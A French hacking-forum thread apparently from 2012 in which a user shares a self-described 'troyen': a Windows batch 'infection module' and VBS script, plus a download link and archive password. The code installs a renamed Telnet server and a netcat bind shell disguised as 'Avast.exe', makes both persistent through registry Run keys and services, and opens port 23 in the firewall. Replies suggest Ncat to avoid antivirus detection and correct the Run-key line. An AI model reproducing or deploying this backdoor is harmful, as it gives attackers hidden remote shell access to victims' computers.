Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 13-11-2012 19:25:21

Spectre
Membre Actif
Inscription : 03-06-2012
Messages : 33

[Windows > bat / vbs] Le « troyen » combo Telnet & netcat.

Le gros problème de l’usage du duo netcat/telnet est que lors d’une connexion quand vous allez dans votre taskmgr.exe

On se retrouve avec trois processus :

cmd.exe (soit une « console -h » qui est invisible)

TlntSvr.exe (soit l’exécutable de telnet qui nous rappel sa présence sans aucune discrétion).

Nc.exe (soit l’exécutable de net qui la encore nous rappel sa présence sans aucune furtivité)

Et un service clairement explicite :

Telnet « permet à un utilisateur distant de se connecter bla bla bla »

Hors, la modification du nom du serveur telnet (tlntsvr.exe) ne change en RIEN l’usage de celui-ci. Exception faite du service qui lui est lié. Idem pour nc.exe. Alors pourquoi ne pas tout simplement modifier les trois ? Et rajouter l’ensemble à un petit module d’infection.

Je vous propose donc un archive contenant

Netcat (avec l’exécutable principale de renommer)
Telnet (l’exécutable renommé > Archive.exe)
Telnet (l’exécutable avec son nom d’origine sait-on jamais > tlntsv.exe )
Infection netcat.bat (met les dossiers où il faut, modifie les clés registres)
Telnet1.vbs (ouvre le port 23 du firewall interne à windows)

Lien de téléchargement : http://www.4shared.com/rar/KtiCT2Pa/Tro … etcat.html
Mot de passe de l’archive : http://www.crack-wifi.com

Le code du module infectieux :

@echo off
[color=#24ff24]rem copy de "archive.exe" dans %windir%\system32
copy Archive.exe "%windir%\system32\"

rem modifie le registre pour changer la destination du service
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr" /v "ImagePath" /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr" /v "ImagePath"  /t "REG_EXPAND_SZ" /d "%SYSTEMROOT%\System32\Archive.exe"

rem modifie le registre pour changer la description du service 
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr" /v "Description" /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr" /v "Description"  /t "REG_EXPAND_SZ" /d "Archivage des fichiers windows"

rem creation du dossier
mkdir %windir%\system32\imp

rem remplire le nouveau dossier avec netcat
copy Netcat\*.* "%windir%\System32\imp\"

rem configurer les services de telnet (qui à était renommé en archive)
Sc \\%computername% config Archive start= auto
Sc \\%computername% config Archive start= enabled

rem configurer le firewall et ouvrir le port 23 pour net cat
start Telnet1.vbs

rem configuration auto au lancement du pc
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "drivers"  /t "REG_SZ" /d "%SYSTEMROOT%\System32\imp\Avast.exe -d -L -e cmd.exe -p 23"

rem creation du service netcat ici renommé en démarage automatique au lancement du pc
Sc create Avast! binPath= c:\system32\imp\Avast.exe start= auto

exit


Telnet1.vbs (ouvre le port 23 du firewall)

Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile

Set objPort = CreateObject("HNetCfg.FwOpenPort")
objPort.Port = 23
objPort.Name = "Telnet"
objPort.Enabled = TRUE
Set colPorts = objPolicy.GloballyOpenPorts

errReturn = colPorts.Add(objPort)

Dernière modification par Spectre (14-11-2012 13:55:11)


Une question ou une idée > [email protected]

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 13-11-2012 22:25:31

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : [Windows > bat / vbs] Le « troyen » combo Telnet & netcat.

Sympa, même si j'aurais plutôt utilisé Ncat... Il est plus lourd que Netcat, mais ce dernier est parfois détecté comme malware (à cause de ce genre d'utilisation sans doute).

--> Ncat, le successeur de Netcat/Cryptcat

Hors Ligne

#3 14-11-2012 13:56:47

Spectre
Membre Actif
Inscription : 03-06-2012
Messages : 33

Re : [Windows > bat / vbs] Le « troyen » combo Telnet & netcat.

Yep, je vient de voir ça je vais m'enquérir du sujet plus en détails.

ps : petite erreur de codage modifier a "REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "drivers"  /t "REG_SZ" /d "%SYSTEMROOT%\System32\imp\nc.exe -d -L -e cmd.exe -p 23"

Dernière modification par Spectre (14-11-2012 13:57:48)


Une question ou une idée > [email protected]

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.022 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]